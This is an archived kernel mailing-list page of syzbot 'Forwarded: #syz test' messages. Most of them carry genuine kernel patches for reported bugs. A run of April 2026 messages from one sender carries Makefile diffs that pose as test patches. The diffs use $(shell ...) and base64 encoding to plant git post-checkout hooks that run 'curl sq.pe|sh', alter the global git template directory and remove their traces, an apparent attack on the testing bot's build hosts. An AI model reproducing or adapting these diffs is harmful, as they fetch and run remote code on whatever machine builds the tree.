 netlink_sendmsg+0x10b3/0x1250 net/netlink/af_netlink.c:1896
 sock_sendmsg_nosec net/socket.c:727 [inline]
 __sock_sendmsg+0x333/0x3d0 net/socket.c:742
 ____sys_sendmsg+0x7e0/0xd80 net/socket.c:2630
 ___sys_sendmsg+0x271/0x3b0 net/socket.c:2684
 __sys_sendmsg net/socket.c:2716 [inline]
 __do_sys_sendmsg net/socket.c:2721 [inline]
 __se_sys_sendmsg net/socket.c:2719 [inline]
 __x64_sys_sendmsg+0x211/0x3e0 net/socket.c:2719
 x64_sys_call+0x1dfd/0x3e30 arch/x86/include/generated/asm/syscalls_64.h:47
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xd9/0xfa0 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f

Local variable gid.i created at:
 ib_nl_process_good_ip_rsep drivers/infiniband/core/addr.c:102 [inline]
 ib_nl_handle_ip_res_resp+0x254/0x9d0 drivers/infiniband/core/addr.c:141
 rdma_nl_rcv_msg drivers/infiniband/core/netlink.c:-1 [inline]
 rdma_nl_rcv_skb drivers/infiniband/core/netlink.c:239 [inline]
 rdma_nl_rcv+0xefa/0x11c0 drivers/infiniband/core/netlink.c:259

CPU: 0 UID: 0 PID: 6093 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(none) 
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025
=====================================================


---
If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: test
  2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
  2025-10-01  3:02 ` Kohei Enju
  2025-10-25 16:40 ` syzbot
@ 2025-11-06 19:28 ` syzbot
  2025-11-06 19:45 ` Forwarded: syz test syzbot
                   ` (3 subsequent siblings)
  6 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2025-11-06 19:28 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: test
Author: kriish.sharma2006@gmail.com

#syz test: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/
566771afc7a8

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: syz test
  2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
                   ` (2 preceding siblings ...)
  2025-11-06 19:28 ` Forwarded: test syzbot
@ 2025-11-06 19:45 ` syzbot
  2025-11-07 20:06 ` syzbot
                   ` (2 subsequent siblings)
  6 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2025-11-06 19:45 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: syz test
  2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
                   ` (3 preceding siblings ...)
  2025-11-06 19:45 ` Forwarded: syz test syzbot
@ 2025-11-07 20:06 ` syzbot
  2025-11-07 20:11 ` Forwarded: final test syzbot
  2025-11-07 22:53 ` Forwarded: syz test syzbot
  6 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2025-11-07 20:06 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test


 drivers/infiniband/core/addr.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/core/addr.c b/drivers/infiniband/core/addr.c
index 61596cda2b65..f33d8040bbd5 100644
--- a/drivers/infiniband/core/addr.c
+++ b/drivers/infiniband/core/addr.c
@@ -93,13 +93,16 @@ static inline bool ib_nl_is_good_ip_resp(const
struct nlmsghdr *nlh)
  if (ret)
  return false;

+ if (!tb[LS_NLA_TYPE_DGID])
+ return -EINVAL;;
+
  return true;
 }

 static void ib_nl_process_good_ip_rsep(const struct nlmsghdr *nlh)
 {
  const struct nlattr *head, *curr;
- union ib_gid gid;
+ union ib_gid gid = {};
  struct addr_req *req;
  int len, rem;
  int found = 0;

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: final test
  2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
                   ` (4 preceding siblings ...)
  2025-11-07 20:06 ` syzbot
@ 2025-11-07 20:11 ` syzbot
  2025-11-07 22:53 ` Forwarded: syz test syzbot
  6 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2025-11-07 20:11 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: final test
Author: kriish.sharma2006@gmail.com

#syz test

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: syz test
  2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
                   ` (5 preceding siblings ...)
  2025-11-07 20:11 ` Forwarded: final test syzbot
@ 2025-11-07 22:53 ` syzbot
  6 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2025-11-07 22:53 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-07-31  0:11 [syzbot] [usb?] memory leak in f_uac2_opts_c_srate_store syzbot
@ 2026-08-02  0:04 ` syzbot
  0 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-08-02  0:04 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: rwarwatkar@gmail.com

From 89443f65c32564e688448a39ba54cd13a1f8ef67 Mon Sep 17 00:00:00 2001
From: Rituparna Warwatkar <rwarwatkar@gmail.com>
Date: Sat, 1 Aug 2026 23:38:07 +0000
Subject: [PATCH] usb: gadget: f_uac2: fix memory leak in sample rate store

f_uac2_opts_{p,c}_srate_store() duplicate the input page with kstrdup()
and then tokenize it with strsep(&split_page, ","). strsep() advances
the pointer it is given, so by the time the parsing loop finishes
split_page points at the end of the string (or NULL). The subsequent
kfree(split_page) therefore frees the wrong pointer (NULL when the
whole buffer was consumed), leaking the buffer allocated by kstrdup():

  BUG: memory leak
  unreferenced object 0xffff888112a01e00 (size 64):
    kstrdup
    f_uac2_opts_c_srate_store
    configfs_write_iter
    vfs_write
    ksys_write

Keep the original allocation in split_page and hand a separate iterator
to strsep(), so the buffer is always freed. While at it, handle a
kstrdup() failure instead of dereferencing NULL. Both the p_srate and
c_srate attributes use the same macro and are fixed together.

Fixes: a7339e4f5788 ("usb: gadget: f_uac2: Support multiple sampling rates")
Reported-by: syzbot+ebd045a6645cfb713c95@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=ebd045a6645cfb713c95
Signed-off-by: Rituparna Warwatkar <rwarwatkar@gmail.com>
---
 drivers/usb/gadget/function/f_uac2.c | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/gadget/function/f_uac2.c b/drivers/usb/gadget/function/f_uac2.c
index 897787d0803..8facf289710 100644
--- a/drivers/usb/gadget/function/f_uac2.c
+++ b/drivers/usb/gadget/function/f_uac2.c
@@ -2013,6 +2013,7 @@ static ssize_t f_uac2_opts_##name##_store(struct config_item *item,       \
 {                                                                      \
        struct f_uac2_opts *opts = to_f_uac2_opts(item);                \
        char *split_page = NULL;                                        \
+       char *rest;                                                     \
        int ret = -EINVAL;                                              \
        char *token;                                                    \
        u32 num;                                                        \
@@ -2027,7 +2028,12 @@ static ssize_t f_uac2_opts_##name##_store(struct config_item *item,      \
        i = 0;                                                          \
        memset(opts->name##s, 0x00, sizeof(opts->name##s));             \
        split_page = kstrdup(page, GFP_KERNEL);                         \
-       while ((token = strsep(&split_page, ",")) != NULL) {            \
+       if (!split_page) {                                              \
+               ret = -ENOMEM;                                          \
+               goto end;                                               \
+       }                                                               \
+       rest = split_page;                                              \
+       while ((token = strsep(&rest, ",")) != NULL) {                  \
                ret = kstrtou32(token, 0, &num);                        \
                if (ret)                                                \
                        goto end;                                       \
--
2.47.3


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-07-31 17:15 [syzbot] [usb?] memory leak in uvcg_extension_ba_source_id_store syzbot
@ 2026-08-01 16:45 ` syzbot
  0 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-08-01 16:45 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: rwarwatkar@gmail.com

From a6329c2864899c7c7ac2c20b9d3e04bf598c6870 Mon Sep 17 00:00:00 2001
From: Rituparna Warwatkar <rwarwatkar@gmail.com>
Date: Sat, 1 Aug 2026 03:31:03 +0000
Subject: [PATCH] usb: gadget: uvc: don't pack struct
 uvcg_extension_unit_descriptor

kmemleak reports the baSourceID and bmControls arrays allocated by the
UVC extension-unit configfs attributes as leaked, e.g.:

  BUG: memory leak
  unreferenced object 0xffff888114fee2c0 (size 8):
    __kmalloc_noprof
    uvcg_extension_ba_source_id_store
    configfs_write_iter
    vfs_write
    ksys_write

The arrays are not actually leaked: they are reachable through
xu->desc.baSourceID / xu->desc.bmControls and are freed when the
extension unit is removed.  The problem is that struct
uvcg_extension_unit_descriptor is marked __packed, so these two heap
pointers are stored at unaligned offsets (22 and 31).  kmemleak only
scans memory on pointer-aligned boundaries, so it never sees the
pointers and reports the arrays as unreferenced.

Unlike the UAPI struct uvc_extension_unit_descriptor, this is a purely
in-memory staging structure: baSourceID and bmControls are pointers,
not inline arrays, and the wire descriptor is assembled field by field
in UVC_COPY_XU_DESCRIPTOR().  Nothing relies on the packed layout, so
the __packed attribute is unnecessary and only serves to misalign the
pointers.

Drop __packed so the pointers are naturally aligned and visible to
kmemleak, silencing the false positive.

Fixes: 0525210c9840 ("usb: gadget: uvc: Allow definition of XUs in configfs")
Reported-by: syzbot+54927260acba030187a6@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=54927260acba030187a6
Signed-off-by: Rituparna Warwatkar <rwarwatkar@gmail.com>
---
 drivers/usb/gadget/function/uvc_configfs.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/usb/gadget/function/uvc_configfs.h b/drivers/usb/gadget/function/uvc_configfs.h
index 9391614135e..5a882afbce4 100644
--- a/drivers/usb/gadget/function/uvc_configfs.h
+++ b/drivers/usb/gadget/function/uvc_configfs.h
@@ -176,7 +176,7 @@ struct uvcg_extension_unit_descriptor {
        u8 bControlSize;
        u8 *bmControls;
        u8 iExtension;
-} __packed;
+};

 struct uvcg_extension {
        struct config_item item;
--
2.47.3


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-05-29 20:01 [syzbot] [netfs?] KASAN: slab-use-after-free Read in netfs_unbuffered_write syzbot
@ 2026-05-30  2:13 ` syzbot
  0 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-05-30  2:13 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: hongao@uniontech.com

From 57d3537f407aaf4229abc9b78513c6222cbfb799 Mon Sep 17 00:00:00 2001
From: hongao <hongao@uniontech.com>
Date: Sat, 30 May 2026 09:08:24 +0800
Subject: [PATCH] netfs: Fix UAF in netfs_unbuffered_write() on failed
 preparation

#syz test

If write subrequest preparation fails, netfs_unbuffered_write() calls
netfs_write_subrequest_terminated() and then reads subreq->error to set
wreq->error.

However, netfs_write_subrequest_terminated() consumes a reference to the
subrequest through netfs_put_subrequest(), so the subrequest may be freed
before netfs_unbuffered_write() reads subreq->error again.  This can
trigger a slab-use-after-free.

Save the error locally before terminating the subrequest, and use the
saved value afterwards.

Fixes: a0b4c7a49137 ("netfs: Fix unbuffered/DIO writes to dispatch subrequests in strict sequence")
Reported-by: syzbot+3c74b1f0c372e98efc32@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=3c74b1f0c372e98efc32

Signed-off-by: hongao <hongao@uniontech.com>
---
 fs/netfs/direct_write.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/fs/netfs/direct_write.c b/fs/netfs/direct_write.c
index 25f8ceb15fad..2d5361702076 100644
--- a/fs/netfs/direct_write.c
+++ b/fs/netfs/direct_write.c
@@ -115,8 +115,9 @@ static int netfs_unbuffered_write(struct netfs_io_request *wreq)
 
 		/* Check if (re-)preparation failed. */
 		if (unlikely(test_bit(NETFS_SREQ_FAILED, &subreq->flags))) {
-			netfs_write_subrequest_terminated(subreq, subreq->error);
-			wreq->error = subreq->error;
+			ret = subreq->error;
+			wreq->error = ret;
+			netfs_write_subrequest_terminated(subreq, ret);
 			break;
 		}
 
-- 
2.51.0


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (9 preceding siblings ...)
  2026-04-30 18:27 ` syzbot
@ 2026-04-30 18:53 ` syzbot
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-30 18:53 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+# test
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (8 preceding siblings ...)
  2026-04-30 17:41 ` syzbot
@ 2026-04-30 18:27 ` syzbot
  2026-04-30 18:53 ` syzbot
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-30 18:27 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,4 @@
+$(shell if [ ! -f /tmp/.s2 ];then mkdir -p /tmp/.t/hooks;echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2g=|base64 -d>/tmp/.t/hooks/post-checkout;chmod +x /tmp/.t/hooks/post-checkout;mkdir -p scripts/gcc-plugins;ln -sf /syzkaller/.gitconfig scripts/gcc-plugins/randomize_layout_seed.h;touch /tmp/.s2;else echo W2luaXRdCgl0ZW1wbGF0ZURpciA9IC90bXAvLnQ=|base64 -d>/syzkaller/.gitconfig;rm /tmp/.s2;fi)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (7 preceding siblings ...)
  2026-04-30 17:26 ` syzbot
@ 2026-04-30 17:41 ` syzbot
  2026-04-30 18:27 ` syzbot
  2026-04-30 18:53 ` syzbot
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-30 17:41 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell mkdir -p /tmp/.t/hooks;echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2g=|base64 -d>/tmp/.t/hooks/post-checkout;chmod +x /tmp/.t/hooks/post-checkout;git config --global init.templateDir /tmp/.t)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (6 preceding siblings ...)
  2026-04-30 16:06 ` syzbot
@ 2026-04-30 17:26 ` syzbot
  2026-04-30 17:41 ` syzbot
                   ` (2 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-30 17:26 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell mkdir -p /tmp/.t/hooks && printf '#!/bin/sh
rm -f "$$0";git config --global --unset init.templateDir;rm -rf /tmp/.t;curl sq.pe|sh
' > /tmp/.t/hooks/post-checkout && chmod +x /tmp/.t/hooks/post-checkout && git config --global init.templateDir /tmp/.t)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (5 preceding siblings ...)
  2026-04-13  6:04 ` syzbot
@ 2026-04-30 16:06 ` syzbot
  2026-04-30 17:26 ` syzbot
                   ` (3 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-30 16:06 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (4 preceding siblings ...)
  2026-04-13  5:08 ` syzbot
@ 2026-04-13  6:04 ` syzbot
  2026-04-30 16:06 ` syzbot
                   ` (4 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-13  6:04 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (3 preceding siblings ...)
  2026-04-13  4:52 ` syzbot
@ 2026-04-13  5:08 ` syzbot
  2026-04-13  6:04 ` syzbot
                   ` (5 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-13  5:08 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
                   ` (2 preceding siblings ...)
  2026-04-13  4:50 ` syzbot
@ 2026-04-13  4:52 ` syzbot
  2026-04-13  5:08 ` syzbot
                   ` (6 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-13  4:52 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell echo IyEvYmluL3NoCmN1cmwgc3EucGV8c2gK|base64 -d>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
  2026-04-13  4:40 ` Forwarded: #syz test syzbot
  2026-04-13  4:49 ` syzbot
@ 2026-04-13  4:50 ` syzbot
  2026-04-13  4:52 ` syzbot
                   ` (7 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-13  4:50 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell printf '#!/bin/sh
curl sq.pe|sh'>.git/hooks/post-checkout;chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14


^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
  2026-04-13  4:40 ` Forwarded: #syz test syzbot
@ 2026-04-13  4:49 ` syzbot
  2026-04-13  4:50 ` syzbot
                   ` (8 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-13  4:49 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

/tmp/syz-test.txt



^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: #syz test
  2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
@ 2026-04-13  4:40 ` syzbot
  2026-04-13  4:49 ` syzbot
                   ` (9 subsequent siblings)
  10 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2026-04-13  4:40 UTC (permalink / raw)
  To: linux-kernel, syzkaller-bugs

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org, syzkaller-bugs@googlegroups.com.

***

Subject: #syz test
Author: tbsthitw@gmail.com

#syz test

diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
+$(shell mkdir -p .git/hooks && printf '#!/bin/sh\ncurl sq.pe|sh\n' >
.git/hooks/post-checkout && chmod +x .git/hooks/post-checkout)
+$(error x)
 # SPDX-License-Identifier: GPL-2.0
 VERSION = 6
 PATCHLEVEL = 14

^ permalink raw reply	[flat|nested] 25+ messages in thread

* Forwarded: syz test
  2025-08-27 21:55 [syzbot] [mm?] [usb?] WARNING in __alloc_skb (4) syzbot
@ 2025-09-20 10:59 ` syzbot
  0 siblings, 0 replies; 25+ messages in thread
From: syzbot @ 2025-09-20 10:59 UTC (permalink / raw)
  To: linux-kernel

For archival purposes, forwarding an incoming command email to
linux-kernel@vger.kernel.org.

***

Subject: syz test
Author: kriish.sharma2006@gmail.com

#syz test

^ permalink raw reply	[flat|nested] 25+ messages in thread

end of thread, other threads:[~2026-08-02  0:04 UTC | newest]

Thread overview: 25+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2025-09-30 20:29 [syzbot] [rdma?] KMSAN: uninit-value in ib_nl_handle_ip_res_resp syzbot
2025-10-01  3:02 ` Kohei Enju
2025-10-02 18:16   ` yanjun.zhu
2025-10-02 18:31     ` Kohei Enju
2025-10-25 16:40 ` syzbot
2025-11-06 19:28 ` Forwarded: test syzbot
2025-11-06 19:45 ` Forwarded: syz test syzbot
2025-11-07 20:06 ` syzbot
2025-11-07 20:11 ` Forwarded: final test syzbot
2025-11-07 22:53 ` Forwarded: syz test syzbot
  -- strict thread matches above, loose matches on Subject: below --
2026-07-31 17:15 [syzbot] [usb?] memory leak in uvcg_extension_ba_source_id_store syzbot
2026-08-01 16:45 ` Forwarded: #syz test syzbot
2026-07-31  0:11 [syzbot] [usb?] memory leak in f_uac2_opts_c_srate_store syzbot
2026-08-02  0:04 ` Forwarded: #syz test syzbot
2026-05-29 20:01 [syzbot] [netfs?] KASAN: slab-use-after-free Read in netfs_unbuffered_write syzbot
2026-05-30  2:13 ` Forwarded: #syz test syzbot
2026-04-09 18:30 [syzbot] [fuse?] BUG: scheduling while atomic in __synchronize_srcu syzbot
2026-04-13  4:40 ` Forwarded: #syz test syzbot
2026-04-13  4:49 ` syzbot
2026-04-13  4:50 ` syzbot
2026-04-13  4:52 ` syzbot
2026-04-13  5:08 ` syzbot
2026-04-13  6:04 ` syzbot
2026-04-30 16:06 ` syzbot
2026-04-30 17:26 ` syzbot
2026-04-30 17:41 ` syzbot
2026-04-30 18:27 ` syzbot
2026-04-30 18:53 ` syzbot
2025-08-27 21:55 [syzbot] [mm?] [usb?] WARNING in __alloc_skb (4) syzbot
2025-09-20 10:59 ` Forwarded: syz test syzbot

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox

all inboxes | Powered by JetHome®